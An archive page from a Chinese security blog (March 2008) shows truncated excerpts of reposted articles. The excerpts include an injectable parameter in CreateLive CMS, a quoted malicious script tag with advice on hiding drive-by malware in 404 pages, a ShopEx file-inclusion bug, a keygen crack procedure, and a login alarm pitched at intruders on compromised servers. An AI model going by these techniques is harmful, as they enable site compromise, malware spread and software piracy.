2008年3月 的日志

CreateLive CMS Version 4.0 0day

2008/03/19 12:39 | 鬼仔 | 工具收集 | 1 个回复

来源:xn_ice的blog
CreateLive CMS Version 4.0 0day.doc
by:xiaok q:391232032.771044833 time: 2008-2-4 02:10 xpsp2 ie7 iis5.1 ……
致敬D.S.T的各位同志,致Hell-Phantom,致on thin ice,致老D,致Doom,致群里那帮有文化的流氓……

漏洞之一

来源kingcms\User\User_Comment.asp CommentID
sub SaveModify()

……
CommentID=Trim(Request("CommentID")) '注入
……
if CommentID="" then
FoundErr=True
ErrMsg=ErrMsg & "<br /><li>请指定评论ID</li>"
阅读全文 »

Tags: ,

404挂马 + 杂谈 + AD

2008/03/19 1:41 | 鬼仔 | 技术文章 | 消灭0回复

来源:六翼刺猬的某某刺猬窝
http://www.688ip.com/dae5g45
今天在卡饭看到的被说是挂马的东西,想要获取源码但返回了404;

细心一看,的确被挂马了,从服务器那里返回的404信息里面包含了挂马代码:
<script src=”http://ad.shitip.com/file/da.js”></script>
貌似最近第三次看到了;

P.S. 某服务器返回的404信息是可以自定义的,如Google的那些:http://www.google.com/2.htm

细想一下,这样是一个不错的挂马选择:

先把挂马代码插入到要返回的404信息里面;

然后才在正常的页面里面写入<iframe>框架或者<script>脚本,src指向本地域名的一个无效URL;
阅读全文 »

Tags: ,

大型门户网站的cdn部署

2008/03/19 1:37 | 鬼仔 | 技术文章 | 消灭0回复

来源:PHP China

新浪采用了ChinaCache做的CDN系统,ChinaCache在全国分布了四十多个点,同时采用基于动态DNS分配的全球服务器负载均衡技术。
  从新浪的站点结构可以看出:
  > www.sina.com.cn
  Server: UnKnown
  Address: 192.168.1.254
  Non-authoritative answer:
  Name: libra.sina.com.cn
  Addresses: 61.135.152.71, 61.135.152.72, 61.135.152.73,61.135.152.74 61.135.152.75, 61.135.152.76, 61.135.153.181,61.135.153.182, 阅读全文 »

Tags:

ShopEx PHP远程包含漏洞

2008/03/19 1:36 | 鬼仔 | 技术文章 | 消灭0回复

鬼仔注:未测试。

文章作者:寂寞hacker
信息来源:http://hi.baidu.com/isbx/

影响版本:4.7及以下

verifycode.php

<?php
/**
*
* 登陆验证码生成文件
*
* @package ShopEx网上商店系统
* @version 4.6
* @author ShopEx.cn <[email protected]>
* @url http://www.shopex.cn/
* @since PHP 4.3
* @copyright ShopEx.cn
*
**/
if (!defined("ISSHOP"))
{
Header("Location:../index.php");
exit;
阅读全文 »

Tags: , , ,

LumaQQ.NET第二个预览版

2008/03/19 1:32 | 鬼仔 | 乱七八糟 | 1 个回复

阿不 http://hjf1223.cnblogs.com

  版权声明:该开源开发包,是基于LumaQQ的基于等价移植到.NET平台下,开发者不直接参与QQ协议的分析工作,移植到.NET平台纯粹是为了方便广大.NET开发者学习和研究之用,并且没有产生任何直接的经济效益,并且纯粹是个人的技术学习研究行为,与本人所在单位没有任何关系。此开发包的用户在使用过程产生的效益和涉及的法律责任与本人没有直接关系。如果影响到您或您的公司利益,敬请谅解并且与我联系,本人会第一时间作出处理。本系列章首发且单发于博客园,由于各种原因不欢迎转载本系列文章,如果您转载了该系列文章请自行承担责任并且转载完整版本,包括版权声明。

在LumaQQ.NET发布首个预览版后,受到的关注和热情出乎我的意料和想像。尽管还只是 阅读全文 »

Tags: ,

WinConnect Server XP 多用户远程桌面服务器

2008/03/19 1:28 | 鬼仔 | 工具收集 | 消灭0回复

来源:黑鹰

WinConnect Server XP能够安装在XP系统下(ps:本人在win2003系统下一样能用HAPPY!!),不受XP系统1用户远程连接限制,并最多支持21个客户端的同时并发连接数,支持24位真彩画面、音频传播,可自定连接方式,支持对客户端发送消息,支持有线或无线TCP/IP协议连接,例如LAN、WAN、 dial-up (Internet)、DSL\ADSL、ISDN、VPN,支持128位加密。每个客户端连接需要增加64MB内存。
破解方法:
1. 安装 V 2.00.204 版本原程序,重启。
2. 将patch目录下的文件拷贝到软件的安装目录下,并在当前目录下运行命令行程序,输入:
keygen.exe -r -u 21 或 直接运行register.cmd文件,重启。
阅读全文 »

编程制作管理员登陆报警器

2008/03/19 1:24 | 鬼仔 | 技术文章 | 消灭0回复

作者:Tuuzed(土仔)
版权声明:可以任意转载,转载时请务必以超链接形式标明文章原始出处和作者信息及本声明。
http://www.cppblog.com/tuuzed/archive/2008/03/16/44656.html

某日,你“偶然”登陆到了一台服务器上,在确认管理员不在后,开始在服务器上做起一些见不得人的事来。但,这时的你一定不是“心定定”,你或许是在想:万一这时有用户登陆进来怎么办?如果有什么程序能在有用户登陆进来时提醒一下,那该多好。

“自己动手,丰衣足食”的时候又来了。搞个思路吧:WIN32系统离不开消息,有人登陆应该会给个消息;得到消息了,判断是什么人登陆;根据登陆用户的权限做出反应。
阅读全文 »

解密风暴

2008/03/19 1:15 | 鬼仔 | 技术文章 | 消灭0回复

来源:Greysign-懒人小G的笔记㊣

最近发现在病毒肆虐的情况下,网友们的安全意识提高,对电脑领域的探索也比较有热情。由于其中的技术涉及到很多的敏感的黑客技术,普通网友们只能从一些黑客网站上探索学习。

但是目前的黑客站点都不是正规网站,乍看是琳琅满目,实质是危机四伏。里面有很多居心不良的人在想尽办法欺骗用户,或者直接捆绑病毒了。而且里面那些所谓黑客的人,思想实在不敢恭维。我们学习是为了帮助更多的人,为别人做点什么,而不是为了所谓自由,所谓技术。那只是一个途径,工具而已。我们是要用我们自由支配的时间,还有技术,来改善这个世界的点点滴滴。

我相信总会有那么一群人,暂且不论技术高底,但他们心怀大思想。他们不会说人人有责,而是想我有责任。所以我想尽我的一点力量,普及一下我所掌握的点滴技术,还有最重要的就是让大家有一份正确的思想。
阅读全文 »

Tags: